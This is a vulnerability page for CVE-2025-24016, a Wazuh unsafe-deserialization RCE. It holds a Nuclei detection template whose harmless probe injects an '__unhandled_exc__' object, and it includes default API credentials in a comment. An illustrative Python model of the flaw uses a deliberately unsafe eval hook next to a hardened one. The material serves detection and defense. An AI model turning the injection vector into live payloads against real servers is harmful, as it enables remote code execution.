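Related vulnerability
Title:
Wazuh Code Issue Vulnerability
(CVE-2025-24016)
Description: Wazuh is an open-source application from Wazuh, used to collect, aggregate, index and analyze security data, helping organizations detect intrusions, threats and behavioral anomalies. Wazuh versions from 4.4.0 up to, but not including, 4.9.1 contain a code issue vulnerability. It stems from unsafe deserialization in the distributed API and allows an attacker to achieve remote code execution.
Introduction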
# CVE-2025-24016 Wazuh Unsafe Deserialization RCE Detection
This repository contains a Nuclei template to detect the unsafe deserialization vulnerability in Wazuh servers, identified as **CVE-2025-24016**.
## Template Details
```yaml
id: wazuh-unsafe-deserialization

info:
  name: "Wazuh Unsafe Deserialization RCE Detection"
  author: "Hüseyin TINTAŞ"
  severity: critical
  description: |
    This template detects an unsafe deserialization vulnerability in Wazuh servers.
    The DistributedAPI deserializes JSON data using as_wazuh_object. If an attacker injects
    a malicious object (via __unhandled_exc__), arbitrary Python code execution can be achieved.
    Instead of triggering a shutdown (e.g. via exit), this template uses a non-existent class
    ("NotARealClass") to generate a NameError. A NameError in the response indicates that the
    payload reached the vulnerable deserialization function.
  tags: wazuh, deserialization, rce, unsafe, cve, cve-2025-24016
  reference:
    - https://documentation.wazuh.com/

requests:
  - method: POST
    path:
      - "{{BaseURL}}/security/user/authenticate/run_as"
    headers:
      Content-Type: application/json
      # If needed, uncomment the following line for authentication (Base64 encoded "wazuh-wui:MyS3cr37P450r.*-")
      # Authorization: "Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0="
    body: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
    # Require both matchers; Nuclei's default condition is "or", which would flag any HTTP 500.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: body
        words:
          - "NameError"
```
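Why the probe produces a `NameError`, shown as an added example that is not part of this repository or of Wazuh's code. `unsafe_hook` is a simplified model that assumes the hook resolves `__class__` by evaluating it, and `safe_hook` is one possible hardening that only rebuilds builtin exception classes. All function names are hypothetical; the probe body is the one from the template.

```python
import builtins
import json

# Probe body copied from the template above; it names a class that does not exist.
PROBE_BODY = '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'


def unsafe_hook(dct):
    """Assumed, simplified model of the flaw: the class name is evaluated as code."""
    if "__unhandled_exc__" in dct:
        exc = dct["__unhandled_exc__"]
        # An unknown name fails the lookup, which is the NameError the matcher keys on.
        return eval(exc["__class__"])(*exc["__args__"])
    return dct


def safe_hook(dct):
    """Hardened form: look the name up among builtin exceptions, never evaluate it."""
    if "__unhandled_exc__" not in dct:
        return dct
    exc = dct["__unhandled_exc__"]
    if not isinstance(exc, dict):
        raise ValueError("malformed exception envelope")
    name, args = exc.get("__class__"), exc.get("__args__", [])
    cls = getattr(builtins, name, None) if isinstance(name, str) else None
    if not (isinstance(cls, type) and issubclass(cls, Exception)):
        raise ValueError(f"refusing to rebuild class {name!r}")
    if not isinstance(args, list):
        raise ValueError("__args__ must be a list")
    return cls(*args)


def probe(hook, body):
    """Decode body with the given object_hook and report what happened."""
    try:
        return ("returned", type(json.loads(body, object_hook=hook)).__name__)
    except Exception as err:
        return ("raised", type(err).__name__)


if __name__ == "__main__":
    print(probe(unsafe_hook, PROBE_BODY))
    print(probe(safe_hook, PROBE_BODY))
```

With the hardened hook the same probe is rejected before any name is resolved, so a patched server modelled this way would no longer return the `NameError` the template matches on.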
## Usage
```bash
nuclei -t CVE-2025-24016.yaml -u http://example.com
```
## Contact
For any inquiries or further information, you can reach out to me through:
- [LinkedIn](https://www.linkedin.com/in/huseyintintas/)
- [Twitter](https://twitter.com/1337stif)
File snapshot
[4.0K] /data/pocs/c4d655b54017657fc1205124fb7ca047d8a29c91
├── [1.3K] CVE-2025-24016.yaml
└── [1.8K] README.md
0 directories, 2 files